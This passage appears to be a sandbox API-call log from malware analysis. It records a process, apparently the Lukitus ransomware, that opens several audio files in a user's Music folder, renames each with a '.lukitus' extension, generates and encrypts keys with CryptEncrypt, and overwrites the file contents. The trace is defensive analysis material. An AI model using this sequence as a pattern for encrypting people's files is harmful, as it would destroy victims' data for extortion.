pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.313] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.313] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.313] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.313] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.313] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.313] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.313] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.313] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.313] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.313] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.313] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.313] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.313] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.313] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\F8hMF6kNB.m4a" (normalized: "c:\\users\\aetadzjz\\music\\f8hmf6knb.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.314] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\F8hMF6kNB.m4a" (normalized: "c:\\users\\aetadzjz\\music\\f8hmf6knb.m4a"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\F56924BE-9663-41BB-9260E0D0-755888374530.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\f56924be-9663-41bb-9260e0d0-755888374530.lukitus"), dwFlags=0x9) returned 1 [0108.315] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.315] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.320] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xf4da, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xf4da, lpOverlapped=0x0) returned 1 [0108.321] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.321] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xf4da, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xf4da, lpOverlapped=0x0) returned 1 [0108.321] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.322] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64959bf0, dwHighDateTime=0x1d31760)) [0108.322] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.322] FlushFileBuffers (hFile=0x328) returned 1 [0108.325] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\FrPnIN5nkI.mp3" (normalized: "c:\\users\\aetadzjz\\music\\frpnin5nki.mp3"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefef24a0, ftCreationTime.dwHighDateTime=0x1d30315, ftLastAccessTime.dwLowDateTime=0xca611f50, ftLastAccessTime.dwHighDateTime=0x1d2f815, ftLastWriteTime.dwLowDateTime=0xca611f50, ftLastWriteTime.dwHighDateTime=0x1d2f815, nFileSizeHigh=0x0, nFileSizeLow=0x434f)) returned 1 [0108.325] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.325] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.325] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.325] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.325] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.325] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.325] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.325] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.325] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.325] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.325] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.325] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.325] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.325] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.325] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.325] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.325] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.325] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.325] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.325] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.325] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\FrPnIN5nkI.mp3" (normalized: "c:\\users\\aetadzjz\\music\\frpnin5nki.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.325] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\FrPnIN5nkI.mp3" (normalized: "c:\\users\\aetadzjz\\music\\frpnin5nki.mp3"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\F56924BE-9663-41BB-753475AC-25E968E13AF6.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\f56924be-9663-41bb-753475ac-25e968e13af6.lukitus"), dwFlags=0x9) returned 1 [0108.327] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.327] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.332] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x434f, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x434f, lpOverlapped=0x0) returned 1 [0108.333] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.333] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x434f, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x434f, lpOverlapped=0x0) returned 1 [0108.333] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.333] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x6497fd50, dwHighDateTime=0x1d31760)) [0108.333] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.333] FlushFileBuffers (hFile=0x328) returned 1 [0108.336] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\IUVwA7Tr1T_-Isj.mp3" (normalized: "c:\\users\\aetadzjz\\music\\iuvwa7tr1t_-isj.mp3"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5f3f710, ftCreationTime.dwHighDateTime=0x1d2fec6, ftLastAccessTime.dwLowDateTime=0xdefa0800, ftLastAccessTime.dwHighDateTime=0x1d2fa63, ftLastWriteTime.dwLowDateTime=0xdefa0800, ftLastWriteTime.dwHighDateTime=0x1d2fa63, nFileSizeHigh=0x0, nFileSizeLow=0x6dab)) returned 1 [0108.336] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.336] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.336] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.336] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.336] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.336] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.336] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.336] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.336] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.336] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.336] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.336] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.336] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.336] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.336] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.336] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.336] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.336] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.336] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.336] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.337] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\IUVwA7Tr1T_-Isj.mp3" (normalized: "c:\\users\\aetadzjz\\music\\iuvwa7tr1t_-isj.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.337] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\IUVwA7Tr1T_-Isj.mp3" (normalized: "c:\\users\\aetadzjz\\music\\iuvwa7tr1t_-isj.mp3"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\F56924BE-9663-41BB-3BB4B2F2-CD9A31BA95F9.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\f56924be-9663-41bb-3bb4b2f2-cd9a31ba95f9.lukitus"), dwFlags=0x9) returned 1 [0108.338] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.338] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.343] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x6dab, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x6dab, lpOverlapped=0x0) returned 1 [0108.343] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.344] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x6dab, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x6dab, lpOverlapped=0x0) returned 1 [0108.344] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.344] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x649a5eb0, dwHighDateTime=0x1d31760)) [0108.344] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.344] FlushFileBuffers (hFile=0x328) returned 1 [0108.347] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\j-scGKW u_.wav" (normalized: "c:\\users\\aetadzjz\\music\\j-scgkw u_.wav"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb60bdca0, ftCreationTime.dwHighDateTime=0x1d2f646, ftLastAccessTime.dwLowDateTime=0x3e004d70, ftLastAccessTime.dwHighDateTime=0x1d2f666, ftLastWriteTime.dwLowDateTime=0x3e004d70, ftLastWriteTime.dwHighDateTime=0x1d2f666, nFileSizeHigh=0x0, nFileSizeLow=0x5ded)) returned 1 [0108.347] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.347] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.347] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.347] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.347] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.347] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.347] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.347] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.347] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.347] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.347] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.347] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.347] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.347] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.347] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.347] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.347] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.347] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.347] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.347] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.347] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\j-scGKW u_.wav" (normalized: "c:\\users\\aetadzjz\\music\\j-scgkw u_.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.348] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\j-scGKW u_.wav" (normalized: "c:\\users\\aetadzjz\\music\\j-scgkw u_.wav"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\F56924BE-9663-41BB-67A2C15B-ACE8513D7DCF.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\f56924be-9663-41bb-67a2c15b-ace8513d7dcf.lukitus"), dwFlags=0x9) returned 1 [0108.349] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.349] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.354] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x5ded, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x5ded, lpOverlapped=0x0) returned 1 [0108.354] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.354] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x5ded, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x5ded, lpOverlapped=0x0) returned 1 [0108.355] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.355] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x649cc010, dwHighDateTime=0x1d31760)) [0108.355] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.355] FlushFileBuffers (hFile=0x328) returned 1 [0108.358] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\LAk9JPgeyPGa1dIfJP.wav" (normalized: "c:\\users\\aetadzjz\\music\\lak9jpgeypga1difjp.wav"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa22ae60, ftCreationTime.dwHighDateTime=0x1d2ff28, ftLastAccessTime.dwLowDateTime=0xd878c0a0, ftLastAccessTime.dwHighDateTime=0x1d3040b, ftLastWriteTime.dwLowDateTime=0xd878c0a0, ftLastWriteTime.dwHighDateTime=0x1d3040b, nFileSizeHigh=0x0, nFileSizeLow=0x9e72)) returned 1 [0108.358] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.358] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.358] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.358] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.358] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.358] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.358] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.358] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.358] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.358] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.358] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.358] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.358] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.358] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.358] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.358] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.358] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.358] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.358] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.358] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.358] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\LAk9JPgeyPGa1dIfJP.wav" (normalized: "c:\\users\\aetadzjz\\music\\lak9jpgeypga1difjp.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.358] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\LAk9JPgeyPGa1dIfJP.wav" (normalized: "c:\\users\\aetadzjz\\music\\lak9jpgeypga1difjp.wav"), 